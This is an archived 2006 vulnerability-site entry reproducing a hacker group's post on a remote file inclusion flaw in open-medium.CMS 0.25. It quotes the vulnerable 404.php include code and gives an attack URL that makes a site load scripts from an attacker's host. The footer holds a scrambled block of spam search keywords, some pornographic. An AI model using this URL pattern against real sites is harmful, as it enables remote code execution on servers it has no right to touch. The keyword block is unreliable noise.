about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , open-medium.CMS <= 0.25 (404.php) Remote File Include Vulnerability




2006-05-25 open-medium.CMS <= 0.25 (404.php) Remote File Include Vulnerability
Rated as : High Risk

################ DEVIL TEAM THE BEST POLISH TEAM #################
#open-medium (0.25) - Content Management System - Remote File Include
Vulnerabilities
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
##################################################################
[code]
404.php:

.......

} else {
// templates verwenden
if
(!@include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys".$REDSYS["LanguagePath"]."/404.tmp"))
{
include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys/404.tmp");
}
}

?>

[/code]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.site.com/[open-mediumCMS_path]/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=[evil_scripts]


###################################################################
#Elo ;-)


securitydot.net - 2006-05-25

Advertising

Copyright 2007, SecurityDot
Sat, 22 Nov 2008 14:32:53 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
free women www.onsoso www.www.st symantec a t84t news for C WWW.XXX89. sexybabyes news for c pinoy sex CMS is Fre Www.sex.po ;linux ker turk porno sex arab v www.89.c0m AzDG t580t 25 age blu t495t Www.89sex. sex arab v Zakirxxx Adegan sek eq2 mambo Remo 1.3.0a 200 /compo crack data SEXYINDIAN pinkword.c Any sex pi free pornc t945t Powered By securityli t945t Www. Funf cpanel yaunger ho free pornc sibell pinkword.c swex xindefanwe Teen video ProFTPD 1. t124t search/exp SEX KAGOL